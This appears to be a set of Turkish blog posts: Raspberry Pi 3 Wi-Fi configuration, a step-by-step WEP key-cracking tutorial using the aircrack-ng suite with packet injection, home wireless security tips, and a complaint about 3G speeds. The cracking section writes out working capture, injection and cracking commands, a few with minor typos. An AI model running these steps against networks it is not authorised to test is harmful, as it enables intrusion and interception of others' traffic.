raspberry pi 3 üzerinde kablosuz ağ ayarları
raspberry pi 3 kablosuz ağ özelliği ile geliyor ve eski modellerindeki gibi driver vb tanıtımı ile uğraşmıyorsunuz. bununla ilgili daha önce bir yazı paylaşmıştım. “raspberry pi ““ raspbian : kablosuz bağlantı ayarları”
raspberry pi 3 üzerinde wifi gömülü olduğu için wifi ayarlarını yapmanız ise oldukça kolay. öncelikle wpa_supplicant.conf dosyasnı açıyoruz
pi@raspberrypi:~ $ nano /etc/wpa_supplicant/wpa_supplicant.conf
ve dosya içerisine
network={
ssid="kablosuz_agda_kullanilan_iot.gen.tr"
psk="kablosuz_ag_sifresi"
proto=RSN
key_mgmt=WPA-PSK
pairwise=CCMP
auth_alg=OPEN
}
satırlarınızı ekliyoruz
burada ssid ve şifre dışındaki alanlar konusunda bilginiz yoksa ve modeminiz ile gerekli uyumlu şekilde konfigürasyon yapmak istiyorsanız aşagıdaki eşleştirmeyi kullanabilirsiniz..
proto : WPA2 için RSN , WPA1 için WPA
key_mgmt : kişisel ağ için WPA-PSK , kurumsal ağ için WPA-EAP
pairwise WPA2 için CCMP ve WPA1 için TKIP
auth_alg : ototik bağlannma OPEN, diğer ayarlar için LEAP veSHARED
Kablosuz Ağlarda Güvenlik – WEP şifresi kırmak
Gerekli donanım ve bilgi ile radyo dalgaları yakalanıp elde edilen verilen çözümlenebilir. Burada 802.11 standartları çerçevesinde WEP ile şifreleme yapılmış kablosuz ağlardaki veri yakalama ve kullanılan şifreleme anahtarını çözülmesi anlatılmaya çalışılacaktır.
Bu işlem sırasında
– airmon-ng
– aireplay-ng
– airodump-ng
– aircrack-ng
uygulamaları kullanılacaktır. (Benzer işi yapacak başka programlar mevcuttur) Bu uygulamaları kullanacağımız için bu yazılımlar ile uyumlu 802.11 uyumlu kablosuz ağ adaptörü gerekmektedir.
Bu yazılımların windows versiyonları sözde vardır ancak hayatta bulaşmanızı önermem. Bu ve benzeri yazılımları içinde bulunduran BT linux dağıtımını kullancağınız. Bu dağıtımın live ve wmware sürümleri mevcuttur.
Öncelikle birden fazla komut yorumyacı penceresi açalım. Her bir işlemi ayrı bir ğencerede yapmak bize kolaylık sağlayacaktır.
>ifconfig
ve
>iwconfig
ile kablosuz ağ adaptörümüz hakkında bilgi alalım. Bize kablosuz ağ adaptörümün MAC adresi ve sistemde tanımlı olduğu ad gerekli olacaktır (wlan0, usb01 v.b.)
bizim için
kablosuz ağ adaptörü : wlan0
mac adresi : 00-11-22-33-44-55-66-77
şeklinde olduğunu kabul edelim.
Bu bilgileri edindikten sonra kablosuz ağ adaptörümüz üzerinden dinleme yapacağımız sanal adaptörü oluşturalım.
>airmon-ng start wlan0
Bu uygulamadan sonra monX şeklinde bir sanal adaptör oluşturulacaktır. (mon0 olarak oluşturulduğunu varsayılacaktır) Bunu durdurmak için
>airmon-ng stop mon0
ile bu servis durdurulacaktır.
>airodump-ng mon0
ile kapsamı alanı içerisindeki olduğumuz ağlar ve bu ağlar hakkında bilgi alabiliriz. Bu komut 802.11 de tanımlı kanalları sırası ile taradığı için bu şekilde kullanmayı tercih etmiyeceğimiz. bir çok modemde standart olarak 11. kanal çoğu kullanıcı tarafından değiştirilmeden kullanılmaktadır. (bu yüzden kendi ağlarımızda çoklu kanal özellği aktif etmekte veya farklı kanal kullanmakta fayda var )
Daha hızlı bir tarama için bir kanal belirleyelim
>airodump -c 11 mon0
ile 11. kanalda yayın yapan kablosuz ağların listesini alalım.
mevcut tablodan WEP ile şifrele yapılmış bir ağ seçiyoruz. Bizim için önemli olan yayın yapan cihazın MAC adresi. (mac adresini 00-22-33-44-55-66-77-88 şeklinde kabul edelim) Şimdi bu ağdaki verileri çözümlemek üzere bilgisayarımıza kaydedelim.
>airodump -c 11 –bssid 00-22-33-44-55-66-77-88 –ivs -w agtrafigi mon0
bu işlemden sonra yakalan veriler agtrafigi-01.ivs dosyasına kaydedilecektir. Yalnız burada dikkat edilmesi gereken bir nokta data değeridir.
kullanılan şifreye göre 5000 ve üzerinde data gerekemtekdir. Eğer data değeri artmıyorsa data değerini bizim arttırmamız gerekmektedir.
>aireplay -1 2 -o 10 -q 10 -a 00-22-33-44-55-66-77-88 -h 00-11-22-33-44-55-66-77 mon0
ve farklı bir pencerede
>aireplay -2 -p 0841 -c ff-ff-ff-ff-ff-ff -b 00-22-33-44-55-66-77-88 -h 00-11-22-33-44-55-66-77 mon0
komut dizisini çalıştıralım. Data değerimiz artık artmaya başlayacaktır.
şimdi elde ettiğimiz verileri kullanarak WEP şifresini bulmya geldi. Bunun için
>aircrack-ng -a 1 agtrafigi-01.ivs
komutunu kullanıyoruz. Bulunan şifre bize HEX olarak verilecektir.
WEP şifresi kurmak işte bu kadar basit. WPA içinde benzer yöntem kullanılmaktadır. Ancak bazı komutlarda parametreler değişmekte ve son adımad şifre kırma aşamasında kendi oluşturdğumuz şifre-listesi ni kullanmamız gerekecektir. Ne kadar zor bir şifre seçilmiş ise bulmak o kadar zor olacaktır.
Kablosuz Ağlarda Güvenlik
Bir çok internet kullanıcısı teknoloji merakından ve eksik – yanlış bilgisinden dolayı kablosuz ağlara yönelmekte ve kablosuz ağlarda gerekli önlemleri almamaktadırlar.
Bu kullanıcılar durumun ciddiyetinden farksız şekilde dizüstü bilgisayarımda, mobil cihazlarımda kablosuz internet kullanıyorum, kablodan kurtuldum şeklinde değerlendirmektdirler.
Peki bu kablosuz ağlardaki sakınca nedir.
Yeterli güvenlik önlemi alınmamış ağlar kapsamı alanı içindeki tüm kullanıcıların erişimine imkan vermektedir.
Peki bu erişim hakkına sahip olunabilirse ne yapılabilir sorusu gelecektir aklımıza;
Bu şekildeki bir ağa sızan kullanıcıların internet üzerinden yapmış olduğu her türlü faaliyetten yasal olarak kablosuz ağın güvenliğini almayan kişi sorumludur. (Herhangi bir yasal durumda suçlu kablosuz ağın sahibi olacaktır bu durumdan kullanıcıların bir çoğunun bilgisi yoktur)
Kotalı internet kullanıcıları kendi yapmadıkları veri tragiğine ücret ödemek durumunda kalacaklardır. Ay sonunda gelen faturaya şaşıracak ben kullanmadım diye suçu internet servis sağlayısına atacak onlardan çzöüm bekleyecektir.
Kablosuz iletişim sırasında her türlü yazışma, bankacılık işlemleri, dosya transferi v.b. radyo dalgaları olarak uzaya yayılmaktadır. Gerekli bilgiye sahip ve düzeneğe sahip kişiler tarafından bu bilgiler dinlene – izlenebilir. Bu yüzden dolayı mutlaka en üst düzeyde veri şifreleme yöntemlerini kullanmamız gerekmektedir.
Şu andaki kullanılmakta olan bir çok modem WEP, WPA/WPA2 desteklemektedir. Ancak kolay olmasından dolayı bir çok kullanıcı hala WEP kullanmaktadır. WPA aya göre çözülmesi çok kolay olan WEP dn tüm kullanıcılar acilen kullanmayı bırakmalıdır.
Sonuç olarak bir kablosuz ağda kullancıların alabilecekleri önlemleri sıralayacak olursak
– SSID fabrika ayarlarından bırakılmalı ve farklı bir isim verilmelidir.
– SSID gizlenmelidir.
– MAC filtreleme aktif hale getirilmelidir.
– Donanımların izin verdiği maksimum bit uzunluklu şiferleme yöntemleri kullanılmalı
– Şifrelemede kullanılan şifreler kısa ve kolay şifreler seçilmemeli. ( örnek : pi.$65Adjfg!ApldTmkFlkfgOl345 )
– Ağda oturum açma özelliği kullanılmalı.
– Yayın yapan cihazda ip bloğu doğru şekilde tanımlanmalı, ağı kullanacak birgisayar sayısınca ip dağıtacak şekilde ayarlannmlı.
3G gerçekte ne kadar hızlı
Ülkemizde 3G kısa bir süre önce hizmete girdi. Peki hangi operatörde ne kadarlık bir bağlantı hızına sahip olacağınız, en iyisi hangisi diye insan ister istemez düşünüyor.
Bu merakla mobil operatörlerin bayilerine gittiğiniz zaman hemen şöyle hızlı böyle hızlı diye anlatmaya başlıyorlar. Ve hemen dizüstü bilgisayarlarını size çevirip bakın şu an dosya indiriyorum ve gördüğünüz gibi adsl den daha hızlı şeklinde açıklama yapıyorlar.
Gerçektende 6 – 7 Mbps ile download yapıldığını görebiliyorsunuz. Eğer buna aldanıp hemen abone olur ve firmaların verdikleri bedava modemide alıp işinizin yolunu tuttuğunuzda birde ne görüyorsunuz. Kapsama alanı dışındasınız. Hani il merkezlerinde 6 -7 Mbps ile bağlanacaktım diyorsunuz. Hemen çağrı merkezini arıyorsunuz ve o an bulunduğunuz bölgede 3G hizmetin verilmediğinii ögreniyorsunuz. İş yerim daha merkezi bir yerde iş yerinde çalışmıyorsa evimde nasıl çalışacak düşüncesi ile evinizin yolunu tutuyorsunuz ve tahmin ettiğiniz şey ile karşılaşıyorsunuz. Büyük şeyler beklediğiniz 3G bir anda sizin için bitiyor. Eğer biraz şanslı iseniz evinizde veya işinizde telefonunuzda veya modeminizde 3G hizmetinin alınabilieceginiz gördügünüzde mutlu oluyorsunuz.
Ancak dizüstünü açıp bir dosya indirmeyi denediğinizde bayideki 7 Mbps i gören hızın şişirme olduğunu fark ediyorsunuz. Aslında bu sözleşmede yazıyor ve 3G hizmetini almak istediğinizde kabul etmiş oluyorsunuz. T.V. reklamlarında hızlıca alt taraftan geçen küçük yazılarda da yazıyor. Bu hız size sürekli verilecek hız değildir. Şebekenin durumuna ve kapsama alanınıza göre bu hızda değişiklik olabilirmiş. En azından minumum hız nedir diye merak edip onu öğrenmek istediğinizde ise bir alt sınırla ilgili bir ifade bulamıyorsunuz. ( Çünkü kapsama alanını bulursanız şanslısınız. )
Bireysel testlerde en iyi sonucu AVEA ile yakalamış olmak beni şaşırttı. Pardus imaj dosyasını indirirken 5 Mbps lik bir hızı gördüm. Ancak mevcut fiyatlarla bulduğumuz her nokta ADSL ve TTNET Wi-Fi kullanmaya devam.